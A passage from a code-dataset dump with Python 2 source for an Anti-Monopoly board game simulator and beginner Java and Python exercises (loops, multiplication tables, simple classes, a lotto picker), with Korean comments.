self.inc_turn()\n def get_stats(self):\n print \" \"\n print \"~~~~STATISTICS~~~~\"\n for player in self.players:\n print \"Player \" + str(player.get_name()) + \" ~ $\" + str(player.get_budget()),\n if player.get_style() == 
\"m\":\n print \" is a monopolist\"\n else:\n print \" is a competitor\"\n for prop in player.get_owned():\n if prop.get_style() == \"property\":\n print prop.get_name() + \" \" + str(prop.get_houses()) + \" houses\",\n else:\n print prop.get_name(),\n if prop.check_mortgage() == True:\n print \" is mortgaged\"\n else:\n print \"\"\n def __init__(self, num_players, debugging, slow):\n i = 0\n min_tol = 50\n max_tol = 400\n self.debugging = debugging\n self.turn = 0\n self.locations = []\n self.new_board = BOARD()\n self.board = self.new_board.get_board()\n self.players = []\n while (i < num_players):\n if ((i % 2) == 0):\n self.players.append(PLAYER(i, \"m\", [\"h\",\"p\",\"u\"], [\"h\",\"m\"], random.randint(min_tol,max_tol),1500))\n else:\n self.players.append(PLAYER(i, \"c\", [\"h\",\"p\",\"u\"], [\"m\",\"h\"], random.randint(min_tol,max_tol),1500))\n self.locations.append(0)\n i += 1\n i = 0\n while i <= 1000:\n alive = False\n while alive == False:\n if self.players[self.turn].check_out() == False:\n alive = True\n else:\n self.inc_turn()\n print \"TURN \" + str(i+1)\n self.take_turn()\n print \"\"\n if slow == True:\n time.sleep(5)\n winner = self.check_win()\n if winner == True:\n break\n i += 1\n self.get_stats()\n" }, { "alpha_fraction": 0.5150631666183472, "alphanum_fraction": 0.523809552192688, "avg_line_length": 24.725000381469727, "blob_id": "3e6bae8cec820b2884b0c41c83e5ce13c6c2dda6", "content_id": "39f972f193536910a80d77bd89c46d63e928f89e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1029, "license_type": "permissive", "max_line_length": 78, "num_lines": 40, "path": "/classes/functions.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "import random\n\ndef roll(num):\n total = 0\n while num > 0:\n total += random.randint(1,6)\n num -= 1\n return total\n\ndef get_owner(prop, players):\n for player in players:\n for pprop in player.get_owned():\n if 
pprop.get_name() == prop:\n return player.get_name()\n return -1\n\ndef num_owned(player,prop):\n num = 0\n for pprop in player.get_owned():\n if prop.get_style() == \"property\" and pprop.get_style() == \"property\":\n if pprop.get_city() == prop.get_city():\n num += 1\n else:\n if pprop.get_style() == prop.get_style():\n num += 1\n return num\n\ndef find_mult_own(props):\n cities = []\n mults = []\n mult_props = []\n for prop in props:\n if (prop.get_city in cities):\n mults.append(prop.get_city())\n else:\n cities.append(prop.get_city())\n for prop in props:\n if (prop.get_city() in mults):\n mult_props.append(prop)\n return mult_props\n" }, { "alpha_fraction": 0.5779502987861633, "alphanum_fraction": 0.6686335206031799, "avg_line_length": 57.54545593261719, "blob_id": "34a01bc4aeea532b6219d9eb4d3d605afab963ae", "content_id": "406a2f657d076d10e9f9d0f0860159d403b6f540", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 3220, "license_type": "permissive", "max_line_length": 92, "num_lines": 55, "path": "/classes/board.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "from square import SQUARE\nfrom square import PROPERTY\nfrom square import CM\nfrom square import INCOME_TAX\nfrom square import UTILITY\nfrom square import TRANSPORT\nfrom square import AMF\nfrom square import GOTO\nfrom square import PROPERTY_TAX\n\nclass BOARD:\n def get_board(self):\n return self.board\n def __init__(self):\n self.board = []\n self.board.append(SQUARE(\"start\",\"start\"))\n self.board.append(PROPERTY(\"basin st.\",\"new orleans\",60,50,6,6,5,10))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"french quarter\",\"new orleans\",60,50,6,6,5,10))\n self.board.append(INCOME_TAX(\"income tax\"))\n self.board.append(TRANSPORT(\"u.s. 
railroad\"))\n self.board.append(PROPERTY(\"sunset blvd.\",\"los angeles\",100,50,10,10,5,10))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"wilshire blvd.\",\"los angeles\",100,50,10,10,5,10))\n self.board.append(PROPERTY(\"hollywood blvd.\",\"los angeles\",120,66,12,12,5,10))\n self.board.append(SQUARE(\"sightseeing tour\",\"sightseeing tour\"))\n self.board.append(PROPERTY(\"rush st.\",\"chicago\",140,100,14,14,10,20))\n self.board.append(UTILITY(\"u.s. electric company\"))\n self.board.append(PROPERTY(\"state st.\",\"chicago\",140,100,14,14,10,20))\n self.board.append(PROPERTY(\"michigan ave.\",\"chicago\",160,100,16,16,10,20))\n self.board.append(TRANSPORT(\"u.s. bus company\"))\n self.board.append(PROPERTY(\"locust st.\",\"philadelphia\",180,100,18,18,10,20))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"chesnut st.\",\"philadelphia\",180,100,18,18,10,20))\n self.board.append(PROPERTY(\"walnut st.\",\"philadelphia\",200,100,20,20,10,20))\n self.board.append(AMF(\"anti-monopoly foundation\"))\n self.board.append(PROPERTY(\"brattle st.\",\"boston\",220,150,22,22,15,30))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"harvard square\",\"boston\",220,150,22,22,15,30))\n self.board.append(PROPERTY(\"beacon st.\",\"boston\",240,150,24,24,15,30))\n self.board.append(TRANSPORT(\"u.s. air line\"))\n self.board.append(PROPERTY(\"georgetown\",\"washington\",260,150,26,26,15,30))\n self.board.append(PROPERTY(\"constitution ave.\",\"washington\",260,150,26,26,15,30))\n self.board.append(UTILITY(\"u.s. 
gas company\"))\n self.board.append(PROPERTY(\"pennsylvania ave.\",\"washington\",280,150,28,28,15,30))\n self.board.append(GOTO(\"go to\"))\n self.board.append(PROPERTY(\"fisherman's wharf\",\"san francisco\",300,200,30,30,20,40))\n self.board.append(PROPERTY(\"union square\",\"san francisco\",300,200,30,30,20,40))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"nob hill\",\"san francisco\",320,200,32,32,20,40))\n self.board.append(TRANSPORT(\"u.s. trucking company\"))\n self.board.append(CM(\"competitor or monopolist\"))\n self.board.append(PROPERTY(\"fifth ave.\",\"new york\",350,200,35,35,20,40))\n self.board.append(PROPERTY_TAX(\"property tax\"))\n self.board.append(PROPERTY(\"wall st.\",\"new york\",400,200,40,40,20,40))\n" }, { "alpha_fraction": 0.6276595592498779, "alphanum_fraction": 0.6382978558540344, "avg_line_length": 12.428571701049805, "blob_id": "787c96ac1c365e5e8f16222527f83f10293f0da5", "content_id": "70a6cf213cdbbf3c2e84b66766fdad088cbb67da", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 94, "license_type": "permissive", "max_line_length": 31, "num_lines": 7, "path": "/main.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "from classes.game import GAME\n\ndef main():\n test = GAME(4, True, False)\n return\n\nmain()\n" }, { "alpha_fraction": 0.47033968567848206, "alphanum_fraction": 0.4885921776294708, "avg_line_length": 28.883838653564453, "blob_id": "f5d39612c74cffea44607a083f1e605803d69e1f", "content_id": "affcea19eb6be970692970a7dc0ecbed8bcf29dc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5917, "license_type": "permissive", "max_line_length": 82, "num_lines": 198, "path": "/classes/square.py", "repo_name": "stonek4/anti-monopoly", "src_encoding": "UTF-8", "text": "from functions import roll\n\nclass SQUARE:\n def get_name(self):\n return 
self.name\n def get_style(self):\n return self.style\n def __init__(self, name, style):\n self.style = style\n self.name = name\n\nclass GOTO(SQUARE):\n def get_value(self,player):\n if(player == \"m\"):\n return [\"straight\",\"sightseeing tour\"]\n if(player == \"c\"):\n return [\"move\",\"sightseeing tour\"]\n def __init__(self,name):\n SQUARE.__init__(self,name,\"go to\")\n\nclass PROPERTY_TAX(SQUARE):\n def get_value(self):\n return 75\n def __init__(self, name):\n SQUARE.__init__(self, name, \"property tax\")\n\nclass INCOME_TAX(SQUARE):\n def get_value(self, amount):\n if (amount < 200):\n return amount\n else:\n return 200\n def __init__(self, name):\n SQUARE.__init__(self, name, \"income tax\")\n\nclass AMF(SQUARE):\n def get_value(self, player):\n if(player == \"m\"):\n return [\"pay\",160]\n elif(player == \"c\"):\n number = roll(1)\n if (number == 1):\n return [\"collect\",25]\n elif (number == 2):\n return [\"collect\",50]\n else:\n return [\"collect\",0]\n def __init__(self,name):\n SQUARE.__init__(self,name,\"anti-monopoly foundation\")\n\nclass PROPERTY(SQUARE):\n def get_cost(self):\n return self.cost\n def get_city(self):\n return self.city\n def get_m_val(self):\n return self.v_mort\n def get_um_val(self):\n return self.v_umort\n def get_h_val(self):\n return self.c_house\n def get_houses(self):\n return self.houses\n def add_house(self):\n self.houses += 1\n return True\n def rem_house(self):\n self.houses -= 1\n def mortgage(self):\n self.is_mortgaged = True\n return True\n def un_mortgage(self):\n self.is_mortgaged = False\n return True\n def check_mortgage(self):\n return self.is_mortgaged\n def get_value(self, owner, number):\n if(owner == \"m\" and number > 1):\n return (self.m_rent*2) + (self.m_rise*self.houses)\n else:\n return self.c_rent + (self.c_rise*self.houses)\n def __init__(self, name, city, cost, c_house, c_rent, m_rent, c_rise, m_rise):\n SQUARE.__init__(self, name, \"property\")\n self.city = city\n self.cost = cost\n 
self.houses = 0\n self.v_mort = int(cost * .5)\n self.v_umort = int(cost * .55)\n self.c_house = c_house\n self.c_rent = c_rent\n self.m_rent = m_rent\n self.c_rise = c_rise\n self.m_rise = m_rise\n self.is_mortgaged = False\n\nclass CM(SQUARE):\n def get_value(self, player):\n number = roll(2)\n if(player == \"m\"):\n if(number == 2):\n return [\"move\",\"start\"]\n elif(number == 3):\n return [\"collect\",75]\n elif(number == 4):\n return [\"move\",\"beacon st.\"]\n elif(number == 5):\n return [\"pay\",75]\n elif(number == 6):\n return [\"move\",\"u.s. electric company\"]\n elif(number == 7):\n return [\"collect\",50]\n elif(number == 8):\n return [\"move\",\"u.s. air line\"]\n elif(number == 9):\n return [\"pay\",50]\n elif(number == 10):\n return [\"collect_c\",25]\n elif(number == 11):\n return [\"straight\",\"sightseeing tour\"]\n elif(number == 12):\n return [\"pay\",25]\n elif(player == \"c\"):\n if(number == 2):\n return [\"move\",\"u.s. air line\"]\n elif(number == 3):\n return [\"pay\",75]\n elif(number == 4):\n return [\"collect_m\",25]\n elif(number == 5):\n return [\"move\",\"u.s. 
electric company\"]\n elif(number == 6):\n return [\"pay\",25]\n elif(number == 7):\n return [\"move\",\"beacon st.\"]\n elif(number == 8):\n return [\"collect\",75]\n elif(number == 9):\n return [\"move\",\"start\"]\n elif(number == 10):\n return [\"pay\",50]\n elif(number == 11):\n return [\"collect\",50]\n elif(number == 12):\n return [\"move\",\"sightseeing tour\"]\n def __init__(self, name):\n SQUARE.__init__(self, name, \"cm\")\n\nclass UTILITY(SQUARE):\n def mortgage(self):\n self.is_mortgaged = True\n return True\n def un_mortgage(self):\n self.is_mortgaged = False\n return True\n def check_mortgage(self):\n return self.is_mortgaged\n def get_m_val(self):\n return 100\n def get_um_val(self):\n return 110\n def get_cost(self):\n return 150\n def get_value(self, owner, owned):\n number = roll(2)\n if(owned == 1):\n return (number * 4)\n elif(owned == 2):\n if(owner == \"c\"):\n return (number * 4)\n elif(owner == \"m\"):\n return (number * 10)\n def __init__(self, name):\n SQUARE.__init__(self, name, \"utility\")\n self.is_mortgaged = False\n\nclass TRANSPORT(SQUARE):\n def mortgage(self):\n self.is_mortgaged = True\n return True\n def un_mortgage(self):\n self.is_mortgaged = False\n return True\n def check_mortgage(self):\n return self.is_mortgaged\n def get_m_val(self):\n return 75\n def get_um_val(self):\n return 83\n def get_cost(self):\n return 200\n def get_value(self, owner, owned):\n if (owner == \"c\"):\n return 20\n elif (owner == \"m\"):\n return (40*(owned*2))\n def __init__(self, name):\n SQUARE.__init__(self,name,\"transport\")\n self.is_mortgaged = False\n" } ]
7
minu1212/kosa202110
https://github.com/minu1212/kosa202110
c9f872f7d188f3fa059d0bd58bbca282d9a6e3bb
79b55d9302d746bb70c41866a137701710e5a068
d3cbac3f54d6834de3d24233342896400660ba3c
refs/heads/main
2023-09-05T11:33:42.323177
2021-11-11T07:15:06
2021-11-11T07:15:06
null
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5027933120727539, "alphanum_fraction": 0.5335195660591125, "avg_line_length": 16.894737243652344, "blob_id": "5acf896203349fc3ec53ef6dfefb899a2b513c30", "content_id": "92dbffc952916b625e74c16e353f7ce6aad2ccf2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 378, "license_type": "no_license", "max_line_length": 35, "num_lines": 19, "path": "/lotto.py", "repo_name": "minu1212/kosa202110", "src_encoding": "UTF-8", "text": "import random\r\nicnt = int(input(\"구매수량을 입력하시오 : \"))\r\ny = 1\r\nwhile y <= icnt:\r\n\tlotto = []\r\n\ti = 1\r\n\twhile i <= 45:\r\n\t\tlotto.append(i)\r\n\t\ti += 1\r\n\tcnt = 1\r\n\tlottonum =\"\"\r\n\twhile cnt <= 6:\r\n\t\tlistSize = len(lotto) -1\r\n\t\tidx = random.randint(0, listSize)\r\n\t\tnum = lotto.pop(idx)\r\n\t\tlottonum += str(num) +\", \"\r\n\t\tcnt += 1\r\n\tprint(lottonum.rstrip(\", \"))\r\n\ty += 1;\t" }, { "alpha_fraction": 0.42954546213150024, "alphanum_fraction": 0.47045454382896423, "avg_line_length": 21.783782958984375, "blob_id": "452afc02aa1ff5476328cd1061e3e985ddda75e0", "content_id": "2fc4734d130d1f55af0d0d9c16057e5d485658a4", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 894, "license_type": "no_license", "max_line_length": 46, "num_lines": 37, "path": "/20211105/src/Ex16.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex16 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// 1,3,5,7,9곱만 출력하시오.\r\n\t\tfor(int gop = 1; gop <= 9; gop+=2) {\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"=======\");\r\n\t\tfor(int gop = 1; gop <= 9; gop++) {\r\n\t\t\tif(gop % 2 == 0)continue;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"=== while ===\");\r\n\t\tint gop = 0;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tgop ++;\r\n\t\t\tif(gop % 2 == 0) 
continue;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"======\");\r\n\t\tgop = 1;\r\n\t\twhile (true) {\r\n\t\t\tgop++;\r\n\t\t\tif(gop % 2 == 0)continue;\r\n\t\t\tif(gop > 9)break;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"======\");\r\n\t\tgop = 1;\r\n\t\twhile (true) {\r\n\t\t\tgop++;\r\n\t\t\tif(gop % 2 == 0)continue;\r\n\t\t\tSystem.out.println(\"7 * \"+gop+\" = \"+7*gop);\r\n\t\t\tif(gop == 9)break;\r\n\t\t}\r\n\t}\r\n}" }, { "alpha_fraction": 0.529411792755127, "alphanum_fraction": 0.5501729846000671, "avg_line_length": 20.076923370361328, "blob_id": "068c2b8f5f6feba0e075dee28b9824c195c6a023", "content_id": "a78da3694089c1c2aef320bed83f01378caa54be", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 393, "license_type": "no_license", "max_line_length": 37, "num_lines": 13, "path": "/20211109/src/Ex071.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex071 {\r\n\tint first;\r\n\t// 디펄트 생성자 : 생성자가 없으면 자동으로 만들지는 생성자.\r\n\t// 기본으로 존재하는 생성자\r\n\t// 암시적으로 존재한다.\r\n\t// public Ex071(){}가 암시적으로 존재.\r\n\tpublic void setFirst(int first) {\r\n\t\tthis.first = first;\r\n\t}\r\n\tpublic int getFirst() {\r\n\t\treturn this.first;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.36818182468414307, "alphanum_fraction": 0.4000000059604645, "avg_line_length": 18.1875, "blob_id": "5d753c659bcfba72d454ce28a1e4941bc02fa3d0", "content_id": "b161abb177431b89e3cf7149e4e22975bb107bbf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 678, "license_type": "no_license", "max_line_length": 52, "num_lines": 32, "path": "/20211105/src/Ex18.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex18 {\r\n\tpublic static void main(String[] args) {\r\n\t\t// 3단부터 7단까지 출력(while)\r\n\t\t// 3단\r\n\t\tint gop = 
1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\"3 * \" + gop + \" = \" + 3*gop);\r\n\t\t\tgop++;\r\n\t\t}\r\n\t\tgop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\"4 * \" + gop + \" = \" + 4*gop);\r\n\t\t\tgop++;\r\n\t\t}\r\n\t\tgop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\"5 * \" + gop + \" = \" + 5*gop);\r\n\t\t\tgop++;\r\n\t\t}\r\n\t\tSystem.out.println(\"=================\");\r\n\t\tint dan = 3;\r\n\t\twhile (dan <= 7) {\r\n\t\t\tgop = 1;\r\n\t\t\twhile (gop <= 9) {\r\n\t\t\t\tSystem.out.println(\r\n\t\t\t\t\t\tdan + \" * \" + gop + \" = \" + dan * gop);\r\n\t\t\t\tgop++;\r\n\t\t\t}\r\n\t\t\tdan++;\r\n\t\t}\r\n\t}\r\n}\r\n\r\n\r\n\r\n\r\n\r\n\r\n" }, { "alpha_fraction": 0.3240963816642761, "alphanum_fraction": 0.39759036898612976, "avg_line_length": 16.81818199157715, "blob_id": "c0c0e9493fe4e77dd73f2b9091486c9582bb7e96", "content_id": "3dac2047b697e783fc78582d8ff7c33bf1b7cf98", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 830, "license_type": "no_license", "max_line_length": 49, "num_lines": 44, "path": "/20211105/src/Ex15.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UTF-8", "text": "\r\npublic class Ex15 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\tint sum = 0;\r\n\t\t\r\n\t\tfor (int i = 1; i <= 100 ; i++) {\r\n\t\t\tsum += i;\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\tSystem.out.println(\"=== while ===\");\r\n\t\tsum = 0;\r\n\t\tint i = 1;\r\n\t\twhile (i <= 100) {\r\n\t\t\tsum += i;\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\t/* sum = 0\r\n\t\t * i = 1\r\n\t\t * while True:\r\n\t\t * \t\tsum += i\r\n\t\t * \t\tif i == 10 :\r\n\t\t * \t\t\tbreak \r\n\t\t * \t\ti += 1\r\n\t\t * print(sum)\r\n\t\t */\r\n\t\tsum = 0;\r\n\t\ti = 1;\r\n\t\twhile (true) {\r\n\t\t\tsum += i; // i = 1, 2, 3, 4, 5, 6, 7, 8, 9, 10\r\n\t\t\tif (i == 10) break;\r\n\t\t\ti 
++;\r\n\t\t}\r\n\t\tSystem.out.println(sum);\r\n\t\tSystem.out.println(\"================\");\r\n\t\tsum = 0;\r\n\t\ti = 1;\r\n\t\twhile (true) {\r\n\t\t\tsum += i; // 1, 2, 3, 4,5,6,7,8,9, 10\r\n\t\t\ti ++; // 2, 3, 4, 5,6,7,8,9,10, 11\r\n\t\t\tif(i > 10)break; // if(i == 11) break;\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5519534349441528, "alphanum_fraction": 0.5536159873008728, "avg_line_length": 24.19565200805664, "blob_id": "60b9706f40ce9fab4fac6debad3e078462931c41", "content_id": "a87c7dfece35e46ebc4a14f8e4d49416380ddfeb", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1459, "license_type": "no_license", "max_line_length": 54, "num_lines": 46, "path": "/20211105/src/Ex23.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "import java.util.Scanner;\r\n\r\npublic class Ex23 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// num = int(input(\"첫번째숫자를 입력해주세.\"))\r\n\t\t// Scanner\r\n\t\t/*\r\n\t\tScanner sc = new Scanner(System.in);\r\n\t\tSystem.out.print(\"이름을 입력하세요. : \");\r\n\t\tString name = sc.next();\r\n\t\tSystem.out.println(\"이름은 : \" + name);\r\n\t\tSystem.out.print(\"숫자를 입력해주세요. : \");\r\n\t\tint num = sc.nextInt();\r\n\t\tSystem.out.println(\"숫자 : \" + num);\r\n\t\t*/\r\n\t\t// 문제: 단과 곱의 범위를 입력 받아 구구단을 출력하시오.\r\n\t\tScanner sc = new Scanner(System.in);\r\n\t\twhile(true) { // 무조건 실행하기 위해서 true를 사용\r\n\t\t\tSystem.out.print(\"시작 단을 입력해 주세요. :\");\r\n\t\t\tint startDan = sc.nextInt();\r\n\t\t\tSystem.out.print(\"마지막 단을 입력해 주세요. :\");\r\n\t\t\tint endDan = sc.nextInt();\r\n\t\t\tSystem.out.print(\"시작 곱을 입력해 주세요. :\");\r\n\t\t\tint startGop = sc.nextInt();\r\n\t\t\tSystem.out.print(\"마지막 곱을 입력해 주세요. 
:\");\r\n\t\t\tint endGop = sc.nextInt();\r\n\t\t\t\r\n\t\t\tint dan = startDan;\r\n\t\t\twhile (dan <= endDan) {\r\n\t\t\t\tint gop = startGop;\r\n\t\t\t\twhile (gop <= endGop) {\r\n\t\t\t\t\tSystem.out.println(dan + \"*\" + gop +\"=\"+dan*gop);\r\n\t\t\t\t\tgop++;\r\n\t\t\t\t}\r\n\t\t\t\tdan++;\r\n\t\t\t}\r\n\t\t\tSystem.out.println(\"종료하려면 'y'아니면 아무키나. : \");\r\n\t\t\tString stop = sc.next();\r\n\t\t\tif(stop.equals(\"y\")) {\r\n\t\t\t\tSystem.out.println(\"프로그램 종료\");\r\n\t\t\t\tbreak;\r\n\t\t\t}\r\n\t\t}\r\n\t}\r\n}" }, { "alpha_fraction": 0.2978723347187042, "alphanum_fraction": 0.35337650775909424, "avg_line_length": 23.0930233001709, "blob_id": "8193d0b1200db07707c7ecfb3e577eea41359802", "content_id": "f49babac1cf616a3ea7b3fcf72ca0b36edd3f605", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 1107, "license_type": "no_license", "max_line_length": 56, "num_lines": 43, "path": "/20211105/src/Ex14.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex14 {\r\n\r\n\tpublic static void main(String[] args) {\r\n\t\t// i = 1 # 1\r\n\t\t// while i <= 9: # 2\r\n\t\t// \t\tprint(i) # 3\r\n\t\t// i += 1 # 4 => 10\r\n\t\t// 1 -> 2-> 3-> 4 -> 2 -> 3 -> 4->...-> 2\r\n\t\t// for문의 실행순서\r\n\t\t// 1 2 4\r\n\t\tfor(int i = 1 ; i <= 9; i++) {\r\n\t\t\t// 3\r\n\t\t\tSystem.out.println(\"5 * \" + i + \" = \" + 5 * i);\r\n\t\t}\r\n\t\t// 1 --> 2 --> 3 --> 4 --> 2 --> 3 --> 4 --> ... 
--> 2\r\n\t\tint i = 1;\r\n\t\tfor( ; i <= 9; ) {\r\n\t\t\tSystem.out.println(\"5 * \" + i + \" = \" + 5 * i);\r\n\t\t\ti++;\r\n\t\t}\r\n\t\tSystem.out.println(\"=== while ===\");\r\n\t\ti = 1; //1\r\n\t\twhile (i <= 9) { //2\r\n\t\t\tSystem.out.println(\"5 * \" + i + \" = \" + 5 * i); //3\r\n\t\t\ti++; //4\r\n\t\t}\r\n\t\t// while문으로 3단을 출력\r\n\t\tint gop = 1;\r\n\t\twhile (gop <= 9) {\r\n\t\t\tSystem.out.println(\" 3 * \" + gop + \" = \" + 3 * gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"==========\");\r\n\t\tfor(gop = 3; gop <=7; gop++ ) {\r\n\t\t\tSystem.out.println(\" 3 * \" + gop + \" = \" + 3 * gop);\r\n\t\t}\r\n\t\tSystem.out.println(\"===== while =====\");\r\n\t\tgop = 3;\r\n\t\twhile (gop <= 7) {\r\n\t\t\tSystem.out.println(\" 3 * \" + gop + \" = \" + 3 * gop);\r\n\t\t\tgop ++;\r\n\t\t}\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.5593952536582947, "alphanum_fraction": 0.5637149214744568, "avg_line_length": 27.0625, "blob_id": "d10714216467fd214511af8a6c26e194a52b8e04", "content_id": "1db62a19c07d6b1beaeb24ef11daa834c57129b8", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 625, "license_type": "no_license", "max_line_length": 57, "num_lines": 16, "path": "/gugudan.py", "repo_name": "minu1212/kosa202110", "src_encoding": "UTF-8", "text": "while True:\r\n\tstartDan = int(input(\"시작단을 입력해주세요. : \"))\r\n\tendDan = int(input(\"마지막단을 입력해주세요. : \"))\r\n\tstartGop = int(input(\"시작곱을 입력해주세요. : \"))\r\n\tendGop = int(input(\"마지막곱을 입력해주세요. 
: \"))\r\n\tdan = startDan\r\n\twhile dan <= endDan:\r\n\t\tgop = startGop\r\n\t\twhile gop <= endGop:\r\n\t\t\tprint(f\"{dan} * {gop} = {dan * gop}\")\r\n\t\t\tgop += 1\r\n\t\tdan += 1\r\n\tstop = input(\"프로그램을 종료 하시려면 'Y'또는 'y'를 누르고 계소하려면 아무키나 \")\r\n\tif stop == 'Y' or stop == 'y':\r\n\t\tprint(\"구구단 프로그램을 종료합니다.\")\r\n\t\tbreak" }, { "alpha_fraction": 0.5856950283050537, "alphanum_fraction": 0.593792200088501, "avg_line_length": 16.94871711730957, "blob_id": "9a350c3ccd5fa021d36f072ccb1afedc9cce306c", "content_id": "8a407dc108e5362da375efbcfcf17ad5a7e0b7fd", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 883, "license_type": "no_license", "max_line_length": 52, "num_lines": 39, "path": "/20211109/src/Ex061.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex061 {\r\n\tString name;\r\n\tint age;\r\n\tdouble height;\r\n\t/// 자바에서 생성자는 클래스명과 같아야 한다.\r\n\t// 생성자\r\n// 접근지정자 클래스명(매개변수,...)\r\n\tpublic Ex061(String name, int age, double height) {\r\n\t\tthis.name = name;\r\n\t\tthis.age = age;\r\n\t\tthis.height = height;\r\n\t\tSystem.out.println(\"생성자 실행\");\r\n\t}\r\n\t// 메서드 : \r\n// 접근지정자 반환형 함수명 (매개변수)\r\n\t// setter\r\n\t //반환형(void:반환할게 없다)\r\n\tpublic void setAge(int age) {\r\n\t\tthis.age = age;\r\n\t}\r\n\t\r\n\tpublic void setName(String name) {\r\n\t\tthis.name = name;\r\n\t}\r\n\tpublic void setHeight(double height) {\r\n\t\tthis.height = height;\r\n\t}\r\n\t// getter\r\n\tpublic int getAge() {\r\n\t\t// 정수를 반환\r\n\t\treturn this.age;\r\n\t}\r\n\tpublic double getHeight() {\r\n\t\treturn this.height;\r\n\t}\r\n\tpublic String getName() {\r\n\t\treturn this.name;\r\n\t}\r\n}\r\n" }, { "alpha_fraction": 0.6206896305084229, "alphanum_fraction": 0.634482741355896, "avg_line_length": 18.428571701049805, "blob_id": "1e68791757aabc6055d0ef0ff5d1f70f14cc36ca", "content_id": "04c9bb3894b426e96157ccfc81e9bf9334805b49", "detected_licenses": [], "is_generated": false, 
"is_vendor": false, "language": "Java", "length_bytes": 169, "license_type": "no_license", "max_line_length": 40, "num_lines": 7, "path": "/20211109/src/Ex02.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex02 { // class자체가 자료형이 됨\r\n\tint age;\r\n\tdouble height;\r\n\tString name;\r\n\tString addr;\r\n\tboolean gender; // true : 여자, false :남자\r\n}\r\n" }, { "alpha_fraction": 0.54666668176651, "alphanum_fraction": 0.5666666626930237, "avg_line_length": 15.529411315917969, "blob_id": "60577077640017657edb70487b736b368b41ea04", "content_id": "31d50c1edf9e3f2eb97be35173669bdb87385ef1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 342, "license_type": "no_license", "max_line_length": 44, "num_lines": 17, "path": "/20211110/src/Ex03.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex03 {\r\n\tint first;\r\n\tint second;\r\n\tstatic int val;\r\n\tint val1;\r\n \r\n\tpublic int add(/* Ex03 this */) { // 멤버 메서드\r\n\t\treturn val + this.first;\r\n\t}\r\n\tpublic static int sub() { // static 메서드\r\n\t\t// return val - val1; \r\n\t\t// static 메서드에서는 instance를 사용할 수 없다.\r\n\t\treturn val ;\r\n\t\t\r\n\t}\r\n\t\r\n}\r\n" }, { "alpha_fraction": 0.6090909242630005, "alphanum_fraction": 0.6168830990791321, "avg_line_length": 18.210525512695312, "blob_id": "8319b54fd2c2909a14cb8a68d0f8db28eb496397", "content_id": "11d3def93d606ef5055b96d13505ddfbfdbd4559", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Java", "length_bytes": 912, "license_type": "no_license", "max_line_length": 42, "num_lines": 38, "path": "/20211109/src/Ex07.java", "repo_name": "minu1212/kosa202110", "src_encoding": "UHC", "text": "\r\npublic class Ex07 {\r\n\tint 